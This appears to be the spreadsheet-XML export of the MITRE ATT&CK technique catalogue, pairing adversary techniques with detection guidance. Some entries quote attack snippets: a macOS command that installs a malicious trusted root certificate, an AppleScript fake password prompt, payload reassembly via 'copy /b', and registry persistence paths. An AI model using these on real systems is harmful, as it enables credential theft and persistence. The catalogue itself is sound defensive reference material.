Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).</t>
  </si>
  <si>
    <t>command-and-control,lateral-movement</t>
  </si>
  <si>
    <t>Execution through API</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess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t>
  </si>
  <si>
    <t>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)
Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)
* CreateProcessA() and CreateProcessW(),
* CreateProcessAsUserA() and CreateProcessAsUserW(),
* CreateProcessInternalA() and CreateProcessInternalW(),
* CreateProcessWithLogonW(), CreateProcessWithTokenW(),
* LoadLibraryA() and LoadLibraryW(),
* LoadLibraryExA() and LoadLibraryExW(),
* LoadModule(),
* LoadPackagedLibrary(),
* WinExec(),
* ShellExecuteA() and ShellExecuteW(),
* ShellExecuteExA() and ShellExecuteExW()</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Binary file metadata</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</si>
  <si>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</si>
  <si>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[cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</t>
  </si>
  <si>
    <t>Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
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
For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.</t>
  </si>
  <si>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[Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network. (Citation: Mandiant APT1)
Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>defense-evasion,persistence</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Disk forensics,API monitoring,Process monitoring,Component firmware</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>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Firmware](https://attack.mitre.org/techniques/T1019)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</si>
  <si>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Brute Force</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. 
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
[Credential Dumping](https://attack.mitre.org/techniques/T1003) to obtain password hashes may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
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 (Citation: Cylance Cleaver)
A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Kernel drivers</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>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
If a smart card is used for two-factor authentication (2FA),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 (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017)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Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry.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 which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</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</si>
  <si>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(see examples).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establish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[Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File monitoring</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
### Mac
On OSX, the native command &lt;code&gt;screencapture&lt;/code&gt; is used to capture screenshots.
### Linux
On Linux, there is the native command &lt;code&gt;xwd&lt;/code&gt;. (Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>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</si>
  <si>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target user email to collect sensitive information from a target.
Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. 
### Windows
Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) 
### Mac
OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents  (Citation: Operating with EmPyre).</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)
Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</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</si>
  <si>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 (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
Regsvr32.exe can also be used to specifically bypass process whitelisting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SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a "Squiblydoo" attack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Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>InstallUtil</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</si>
  <si>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</si>
  <si>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InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;. 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&lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention,Process command-line parameters</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</si>
  <si>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Staged](https://attack.mitre.org/techniques/T1074).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</si>
  <si>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Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Remote File Copy](https://attack.mitre.org/techniques/T1105) to identify and move files.</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</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</si>
  <si>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</si>
  <si>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Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting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SubTee GitHub All The Things Application Whitelisting Bypass)</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within &lt;code&gt;HKEY_CURRENT_USER\Software\Classes\CLSID\&lt;/code&gt; may be anomalous and should be investigated since user objects will be loaded prior to machine objects in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\&lt;/code&gt;. (Citation: Endgame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t>
  </si>
  <si>
    <t>The  (Citation: Microsoft Component Object Model) (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model)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(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</t>
  </si>
  <si>
    <t>Audio Capture</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</si>
  <si>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</si>
  <si>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</si>
  <si>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System Time Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,API monitoring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</si>
  <si>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t>
  </si>
  <si>
    <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
An adversary may gather the system time and/or time zone from a local or remote system. This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 (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Windows,macOS</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Share Connection Removal</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).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</si>
  <si>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Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</t>
  </si>
  <si>
    <t>The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe.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</si>
  <si>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
### MSBuild
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild) 
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)
### DNX
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft. 
An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)
### RCSI
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)
### WinDbg/CDB
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.
An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)
It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
### Tracker
The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)
An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: Twitter SubTee Tracker.exe)</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
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 (Citation: Demaske Netsh Persistence)
Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)</t>
  </si>
  <si>
    <t>Execution through Module Load</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Process monitoring</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</si>
  <si>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&lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt;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</si>
  <si>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 (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries can use this functionality as a way to execute arbitrary code on a system.</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Digital certificate logs</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)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 (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: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 (Citation: Operation Emmental)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 (Citation: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 (Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys.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 (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: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Packages"=&lt;target binary&gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64,  MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</t>
  </si>
  <si>
    <t>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Management](https://attack.mitre.org/techniques/T1028) can also be used externally.
Adversaries may use remote services to access and persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>API monitoring,Access tokens,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows. (Citation: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 (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt; (Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; (Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account. (Citation: BlackHat Atkinson Winchester Token Manipulation)</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</si>
  <si>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&lt;code&gt;runas&lt;/code&gt;. (Citation: Microsoft runas)
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 An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. (Citation: Pentestlab Token Manipulation)
Access tokens can be leveraged by adversaries through three methods: (Citation: BlackHat Atkinson Winchester Token Manipulation)
**Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.
**Create Process with a Token** - An adversary creates a new access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and uses it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
**Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.
Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. (Citation: Metasploit access token)  The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
### Windows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Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.
### Mac
On Mac, locally mounted shares can be viewed with the &lt;code&gt;df -aH&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</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</si>
  <si>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Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins. (Citation: MRWLabs Office Persistence Add-ins)
Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
### Office Template Macros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inserted into the base templated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 (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)
Word Normal.dotm location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
### Office Test
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)
&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
### Add-ins
Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)
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and Visual Studio Tools for Office (VSTO) add-ins. (Citation: MRWLabs Office Persistence Add-ins)</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: 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t>
  </si>
  <si>
    <t>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Endgame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[Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt;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Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Linux,macOS</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</si>
  <si>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t>
  </si>
  <si>
    <t>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 (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</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</si>
  <si>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[certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</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</si>
  <si>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[Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)
Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection.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t>
  </si>
  <si>
    <t>Input Prompt</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials.</t>
  </si>
  <si>
    <t>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
&lt;code&gt;set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")&lt;/code&gt;
 (Citation: OSX Keydnap malware)
Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper)</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>System calls,Process monitoring</t>
  </si>
